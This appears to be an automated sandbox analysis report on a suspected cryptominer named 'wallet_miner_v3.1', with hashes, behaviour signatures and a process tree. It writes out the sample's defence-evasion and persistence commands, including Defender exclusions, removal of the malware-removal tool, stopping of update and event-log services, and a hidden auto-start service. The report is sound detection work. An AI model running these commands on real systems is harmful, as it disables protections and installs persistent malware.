Overview
overview
10Static
static
101K SOCKS5 HQ.txt.exe
windows10-2004-x64
9Priv8 Grab...v8.exe
windows10-2004-x64
7Project1.exe
windows10-2004-x64
3VExploit 7.5.exe
windows10-2004-x64
9autotiktok.exe
windows10-2004-x64
9carding software.exe
windows10-2004-x64
10cc.exe
windows10-2004-x64
10dom2ip.exe
windows10-2004-x64
7dungbulon_gnp..exe
windows10-2004-x64
10flashSO (3).exe
windows10-2004-x64
8game_12.exe
windows10-2004-x64
8mass_exploit_wp.exe
windows10-2004-x64
9revolve.co...g!.exe
windows10-2004-x64
9suckmydick.exe
windows10-2004-x64
10wallet_min...1).exe
windows10-2004-x64
8xReverseFreeV2.exe
windows10-2004-x64
7xReverseTrial.exe
windows10-2004-x64
7Analysis
-
max time kernel
30s -
max time network
23s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
10-08-2024 09:47
Behavioral task
behavioral1
Sample
1K SOCKS5 HQ.txt.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
Priv8 Grabber by vexelvoxpriv8.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Project1.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
VExploit 7.5.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
autotiktok.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral6
Sample
carding software.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
cc.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral8
Sample
dom2ip.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
dungbulon_gnp..exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral10
Sample
flashSO (3).exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
game_12.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral12
Sample
mass_exploit_wp.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
revolve.com !Pro Cracking!.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral14
Sample
suckmydick.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
wallet_miner_v3.1 (1).exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral16
Sample
xReverseFreeV2.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
xReverseTrial.exe
Resource
win10v2004-20240802-en
General
-
Target
wallet_miner_v3.1 (1).exe
-
Size
5.2MB
-
MD5
c263627b444c7cfacda7683b5d8e3d65
-
SHA1
503fd59856ecd95eb2636ed3c7c7522fa6b9831e
-
SHA256
23cd00b31c81c4258d7400bb802077ed356bdab30756f7194d8576a4ed2e8be8
-
SHA512
3382b876466acceaf628c84eac5d05602833eb7e73591d5889a3fc9bfdeef2f64cc0d8eea51eb721ad343d2e47298ffa63bdf027751af5dc4f91cbc4faa2f912
-
SSDEEP
98304:5a4QonBcCaW1pc0fElZACqqUUAp7TCe648CgWTOSwLbx:c4Q+Bf1pbMlWOUUo38CgWOFbx
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 1328 powershell.exe 4876 powershell.exe -
Creates new service(s) 2 TTPs
-
Sets service image path in registry 2 TTPs 2 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dosvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\UsoSvc\ImagePath = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Executes dropped EXE 1 IoCs
Processes:
tssxsegodzrt.exepid process 1472 tssxsegodzrt.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Drops file in System32 directory 4 IoCs
Processes:
tssxsegodzrt.exewallet_miner_v3.1 (1).exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe tssxsegodzrt.exe File opened for modification C:\Windows\system32\MRT.exe wallet_miner_v3.1 (1).exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
wallet_miner_v3.1 (1).exetssxsegodzrt.exedescription pid process target process PID 4736 set thread context of 912 4736 wallet_miner_v3.1 (1).exe dialer.exe PID 1472 set thread context of 400 1472 tssxsegodzrt.exe dialer.exe PID 1472 set thread context of 3460 1472 tssxsegodzrt.exe dialer.exe PID 1472 set thread context of 3576 1472 tssxsegodzrt.exe dialer.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3188 sc.exe 5008 sc.exe 4612 sc.exe 1012 sc.exe 1684 sc.exe 4748 sc.exe 1176 sc.exe 2024 sc.exe 4852 sc.exe 2684 sc.exe 3188 sc.exe 4676 sc.exe 616 sc.exe 5008 sc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
wallet_miner_v3.1 (1).exepowershell.exedialer.exetssxsegodzrt.exepowershell.exedialer.exepid process 4736 wallet_miner_v3.1 (1).exe 1328 powershell.exe 1328 powershell.exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 912 dialer.exe 912 dialer.exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 4736 wallet_miner_v3.1 (1).exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 1472 tssxsegodzrt.exe 912 dialer.exe 912 dialer.exe 4876 powershell.exe 4876 powershell.exe 4876 powershell.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 4876 powershell.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe 4876 powershell.exe 1472 tssxsegodzrt.exe 1472 tssxsegodzrt.exe 912 dialer.exe 912 dialer.exe 1472 tssxsegodzrt.exe 1472 tssxsegodzrt.exe 1472 tssxsegodzrt.exe 1472 tssxsegodzrt.exe 912 dialer.exe 912 dialer.exe 1472 tssxsegodzrt.exe 1472 tssxsegodzrt.exe 400 dialer.exe 400 dialer.exe 1472 tssxsegodzrt.exe 912 dialer.exe 912 dialer.exe 912 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedialer.exepowershell.exedialer.exedialer.exesvchost.exedescription pid process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 912 dialer.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 400 dialer.exe Token: SeLockMemoryPrivilege 3576 dialer.exe Token: SeAssignPrimaryTokenPrivilege 1612 svchost.exe Token: SeIncreaseQuotaPrivilege 1612 svchost.exe Token: SeSecurityPrivilege 1612 svchost.exe Token: SeTakeOwnershipPrivilege 1612 svchost.exe Token: SeLoadDriverPrivilege 1612 svchost.exe Token: SeSystemtimePrivilege 1612 svchost.exe Token: SeBackupPrivilege 1612 svchost.exe Token: SeRestorePrivilege 1612 svchost.exe Token: SeShutdownPrivilege 1612 svchost.exe Token: SeSystemEnvironmentPrivilege 1612 svchost.exe Token: SeUndockPrivilege 1612 svchost.exe Token: SeManageVolumePrivilege 1612 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1612 svchost.exe Token: SeIncreaseQuotaPrivilege 1612 svchost.exe Token: SeSecurityPrivilege 1612 svchost.exe Token: SeTakeOwnershipPrivilege 1612 svchost.exe Token: SeLoadDriverPrivilege 1612 svchost.exe Token: SeSystemtimePrivilege 1612 svchost.exe Token: SeBackupPrivilege 1612 svchost.exe Token: SeRestorePrivilege 1612 svchost.exe Token: SeShutdownPrivilege 1612 svchost.exe Token: SeSystemEnvironmentPrivilege 1612 svchost.exe Token: SeUndockPrivilege 1612 svchost.exe Token: SeManageVolumePrivilege 1612 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1612 svchost.exe Token: SeIncreaseQuotaPrivilege 1612 svchost.exe Token: SeSecurityPrivilege 1612 svchost.exe Token: SeTakeOwnershipPrivilege 1612 svchost.exe Token: SeLoadDriverPrivilege 1612 svchost.exe Token: SeSystemtimePrivilege 1612 svchost.exe Token: SeBackupPrivilege 1612 svchost.exe Token: SeRestorePrivilege 1612 svchost.exe Token: SeShutdownPrivilege 1612 svchost.exe Token: SeSystemEnvironmentPrivilege 1612 svchost.exe Token: SeUndockPrivilege 1612 svchost.exe Token: SeManageVolumePrivilege 1612 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1612 svchost.exe Token: SeIncreaseQuotaPrivilege 1612 svchost.exe Token: SeSecurityPrivilege 1612 svchost.exe Token: SeTakeOwnershipPrivilege 1612 svchost.exe Token: SeLoadDriverPrivilege 1612 svchost.exe Token: SeSystemtimePrivilege 1612 svchost.exe Token: SeBackupPrivilege 1612 svchost.exe Token: SeRestorePrivilege 1612 svchost.exe Token: SeShutdownPrivilege 1612 svchost.exe Token: SeSystemEnvironmentPrivilege 1612 svchost.exe Token: SeUndockPrivilege 1612 svchost.exe Token: SeManageVolumePrivilege 1612 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1612 svchost.exe Token: SeIncreaseQuotaPrivilege 1612 svchost.exe Token: SeSecurityPrivilege 1612 svchost.exe Token: SeTakeOwnershipPrivilege 1612 svchost.exe Token: SeLoadDriverPrivilege 1612 svchost.exe Token: SeSystemtimePrivilege 1612 svchost.exe Token: SeBackupPrivilege 1612 svchost.exe Token: SeRestorePrivilege 1612 svchost.exe Token: SeShutdownPrivilege 1612 svchost.exe Token: SeSystemEnvironmentPrivilege 1612 svchost.exe Token: SeUndockPrivilege 1612 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exewallet_miner_v3.1 (1).exedialer.exedescription pid process target process PID 4380 wrote to memory of 4752 4380 cmd.exe wusa.exe PID 4380 wrote to memory of 4752 4380 cmd.exe wusa.exe PID 4736 wrote to memory of 912 4736 wallet_miner_v3.1 (1).exe dialer.exe PID 4736 wrote to memory of 912 4736 wallet_miner_v3.1 (1).exe dialer.exe PID 4736 wrote to memory of 912 4736 wallet_miner_v3.1 (1).exe dialer.exe PID 4736 wrote to memory of 912 4736 wallet_miner_v3.1 (1).exe dialer.exe PID 4736 wrote to memory of 912 4736 wallet_miner_v3.1 (1).exe dialer.exe PID 4736 wrote to memory of 912 4736 wallet_miner_v3.1 (1).exe dialer.exe PID 4736 wrote to memory of 912 4736 wallet_miner_v3.1 (1).exe dialer.exe PID 912 wrote to memory of 580 912 dialer.exe winlogon.exe PID 912 wrote to memory of 668 912 dialer.exe lsass.exe PID 912 wrote to memory of 960 912 dialer.exe svchost.exe PID 912 wrote to memory of 60 912 dialer.exe dwm.exe PID 912 wrote to memory of 740 912 dialer.exe svchost.exe PID 912 wrote to memory of 1044 912 dialer.exe svchost.exe PID 912 wrote to memory of 1112 912 dialer.exe svchost.exe PID 912 wrote to memory of 1120 912 dialer.exe svchost.exe PID 912 wrote to memory of 1140 912 dialer.exe svchost.exe PID 912 wrote to memory of 1156 912 dialer.exe svchost.exe PID 912 wrote to memory of 1260 912 dialer.exe svchost.exe PID 912 wrote to memory of 1300 912 dialer.exe svchost.exe PID 912 wrote to memory of 1312 912 dialer.exe svchost.exe PID 912 wrote to memory of 1408 912 dialer.exe svchost.exe PID 912 wrote to memory of 1416 912 dialer.exe svchost.exe PID 912 wrote to memory of 1584 912 dialer.exe svchost.exe PID 912 wrote to memory of 1592 912 dialer.exe svchost.exe PID 912 wrote to memory of 1620 912 dialer.exe svchost.exe PID 912 wrote to memory of 1708 912 dialer.exe svchost.exe PID 912 wrote to memory of 1740 912 dialer.exe svchost.exe PID 912 wrote to memory of 1760 912 dialer.exe svchost.exe PID 912 wrote to memory of 1820 912 dialer.exe svchost.exe PID 912 wrote to memory of 1968 912 dialer.exe svchost.exe PID 912 wrote to memory of 1996 912 dialer.exe svchost.exe PID 912 wrote to memory of 2008 912 dialer.exe svchost.exe PID 912 wrote to memory of 1532 912 dialer.exe svchost.exe PID 912 wrote to memory of 1612 912 dialer.exe svchost.exe PID 912 wrote to memory of 2120 912 dialer.exe spoolsv.exe PID 912 wrote to memory of 2244 912 dialer.exe svchost.exe PID 912 wrote to memory of 2348 912 dialer.exe svchost.exe PID 912 wrote to memory of 2540 912 dialer.exe svchost.exe PID 912 wrote to memory of 2548 912 dialer.exe svchost.exe PID 912 wrote to memory of 2664 912 dialer.exe svchost.exe PID 912 wrote to memory of 2692 912 dialer.exe sysmon.exe PID 912 wrote to memory of 2720 912 dialer.exe svchost.exe PID 912 wrote to memory of 2728 912 dialer.exe svchost.exe PID 912 wrote to memory of 2748 912 dialer.exe svchost.exe PID 912 wrote to memory of 2764 912 dialer.exe sihost.exe PID 912 wrote to memory of 2836 912 dialer.exe svchost.exe PID 912 wrote to memory of 2972 912 dialer.exe unsecapp.exe PID 912 wrote to memory of 2864 912 dialer.exe taskhostw.exe PID 912 wrote to memory of 2204 912 dialer.exe svchost.exe PID 912 wrote to memory of 3316 912 dialer.exe svchost.exe PID 912 wrote to memory of 3412 912 dialer.exe Explorer.EXE PID 912 wrote to memory of 3532 912 dialer.exe svchost.exe PID 912 wrote to memory of 3728 912 dialer.exe DllHost.exe PID 912 wrote to memory of 3880 912 dialer.exe RuntimeBroker.exe PID 912 wrote to memory of 4084 912 dialer.exe RuntimeBroker.exe PID 912 wrote to memory of 876 912 dialer.exe svchost.exe PID 912 wrote to memory of 2140 912 dialer.exe svchost.exe PID 912 wrote to memory of 4432 912 dialer.exe svchost.exe PID 912 wrote to memory of 2488 912 dialer.exe OfficeClickToRun.exe PID 912 wrote to memory of 3948 912 dialer.exe SppExtComObj.exe PID 912 wrote to memory of 2276 912 dialer.exe svchost.exe PID 912 wrote to memory of 3360 912 dialer.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:580
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:60
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1140
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2864
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1408
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2764
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2664
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2836
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2204
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3316
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3412
-
C:\Users\Admin\AppData\Local\Temp\wallet_miner_v3.1 (1).exe"C:\Users\Admin\AppData\Local\Temp\wallet_miner_v3.1 (1).exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4752
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:1684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:3188
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:4676
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:5008
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:912
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "win 32B"3⤵
- Launches sc.exe
PID:1176
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "win 32B" binpath= "C:\ProgramData\ihtuhbzzrjkw\tssxsegodzrt.exe" start= "auto"3⤵
- Launches sc.exe
PID:616
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2024
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "win 32B"3⤵
- Launches sc.exe
PID:4852 -
